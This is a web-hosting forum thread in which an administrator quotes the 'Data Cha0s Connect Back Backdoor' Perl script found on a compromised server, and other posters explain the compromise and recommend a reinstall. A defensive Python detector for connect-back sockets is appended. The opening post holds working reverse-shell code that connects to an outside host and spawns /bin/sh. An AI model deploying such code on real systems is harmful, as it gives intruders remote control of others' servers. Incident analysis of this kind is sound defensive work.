  1. #1

    [URGENT] Data Cha0s Connect Back Backdoor


    For about an hour now my server has not been reachable (websites, ...) from the outside world. All ports seem to be closed except port 22.

    I have found that the following exploit has been executed once on my server:
    "Data Cha0s Connect Back Backdoor"

    1. What does this script do?
    2. and how can I UNDO this script so my websites become available again?

    I have found this script was executed like this: perl 80

    Thanks for helping

    use Socket;
    print "Data Cha0s Connect Back Backdoor\n\n";
    if (!$ARGV[0]) {
    printf "Usage: $0 [Host] <Port>\n";
    print "[*] Dumping Arguments\n";
    $host = $ARGV[0];
    $port = 80;
    if ($ARGV[1]) {
    $port = $ARGV[1];
    print "[*] Connecting...\n";
    $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
    my $target = inet_aton($host);
    if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("Unable to Connect\n");
    print "[*] Spawning Shell\n";
    if (!fork( )) {
    exec {'/bin/sh'} '-bash' . "\0" x 4;
    print "[*] Datached\n\n";

  2. #2
    Join Date
    Jun 2003
    Your machine has had a root compromise. The best (and right) thing to do is get the server reloaded and restore your data from backup. Also hire someone to secure it.

    Russ Foster - Industry Curmudgeon

  3. #3
    I think a full reinstall will be necessary.

    But before doing this, do you think it's possible to undo what the script has done (considering that nothing else was done to the system)? This script looks easy but unfortunately I don't know Perl.

  4. #4
    Join Date
    Apr 2003
    It allowed the hacker to get a shell on your system. It is still fully possible your system was not rooted IF your system was updated. The important thing is running the latest kernel. If you have an older kernel it is highly possible you were rooted. Even if you are running the latest kernel it is possible.

    I would first off change the ssh port then set the firewall to block all ports but ssh. From there run rkhunter and see what you can find. Since you are having trouble with other services it sounds like you were rooted.
    John W, CISSP, C|EH
    MS Information Security and Assurance - Server Administration and Security - Managed VPS and Dedicated Servers with VIP Service

  5. #5
    Join Date
    Mar 2003
    California USA
    Normally if they used the back connect firewall, it's because ingress filtering was enabled and they got in through open egress filtering. I would run chkrootkit and rkhunter and see what happened. You can't know what they did for sure just by looking at that script. If the server is indeed rooted YOU NEED AN OS RELOAD. Don't try to clean it.
    Steven Ciaburri | Proactive Linux Server Management -
    Managed Servers (AS62710), Server Management, and Security Auditing.

  6. #6
    Join Date
    Sep 2002
    Top Secret
    I agree with Steve on this one. Get an OS reload. It looks like your server has been compromised, which means that anything could be happening, and you're extremely insecure, meaning you're a danger not only to YOUR customers but everyone online that way.

    Find out where it came from, get a reload, and then plug the hole.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Linux Problems? WHMCS Issues? +1-866-546-8914 (linux-14) or @whmcsguru on twitter!

  7. #7
    Join Date
    Oct 2003
    Long Island, New York
    Would just like to add that the script itself isn't such a big deal... all it seems to do is create a "connect-back" backdoor situation where the server would connect to the attacker, and not vice versa... this is due to your lack of egress filtering, as Steve mentioned earlier. This shell allowed the attacker a shell with the same level of access as your httpd daemon. I've got a collection of these types of scripts that I've collected from various admin jobs and from the output on my IDS.

    You were actually compromised due to something else... usually an insecure kernel version, or something else quite prone to a local root compromise. - Business Web Hosting Solutions & Server Management Since 2003
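A defender-side check for the pattern posts #5 and #7 describe (the server dialling out and handing the socket to a shell running as the httpd user), as an added example that is not from any poster in this thread. It assumes the single-process `ss -tnpe` line layout shown in the constructed sample and a web server uid of 33; adjust both for your system.

```python
"""Flag connect-back shells in `ss -tnpe` output (added example, not from the thread).

A connect-back backdoor makes the server dial out and hands the socket to
/bin/sh, so it shows up as an ESTAB socket owned by a shell, often as httpd's uid.
"""
import re

# Process names that should normally never own a network socket themselves.
SHELL_LIKE = {"sh", "bash", "dash", "perl", "python", "nc"}
# Assumed uid of the web server user (www-data on Debian-style systems).
WEB_UID = 33

# One `ss -tnpe` line (single owning process assumed): state, queues, local,
# peer, users:(("name",pid=N,fd=N)) uid:N ...
LINE_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)\s+uid:(?P<uid>\d+)'
)

def suspicious_sockets(ss_output):
    """Return one finding per ESTAB socket owned by a shell-like process.

    An ephemeral local port (>= 32768) means the server dialled out: the connect-back pattern.
    """
    findings = []
    for line in ss_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group("state") != "ESTAB":
            continue
        proc = m.group("proc")
        if proc not in SHELL_LIKE:
            continue
        local_port = int(m.group("local").rsplit(":", 1)[1])
        findings.append({
            "pid": int(m.group("pid")),
            "proc": proc,
            "peer": m.group("peer"),
            "outbound": local_port >= 32768,
            "web_user": int(m.group("uid")) == WEB_UID,
        })
    return findings

# Constructed sample: normal apache2 and sshd sockets, plus a /bin/sh (uid 33) that dialled out to port 80.
SAMPLE = """\
ESTAB 0 0 192.0.2.10:80 198.51.100.4:51822 users:(("apache2",pid=1201,fd=12)) uid:33 ino:31337 sk:1
ESTAB 0 0 192.0.2.10:22 198.51.100.9:40110 users:(("sshd",pid=980,fd=4)) uid:0 ino:31338 sk:2
ESTAB 0 0 192.0.2.10:43122 203.0.113.7:80 users:(("sh",pid=4242,fd=3)) uid:33 ino:31339 sk:3
"""
```

Run it against `ss -tnpe` output from the box (or the constructed SAMPLE); a finding with both `outbound` and `web_user` true is the socket to kill and the pid to investigate before the reload.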
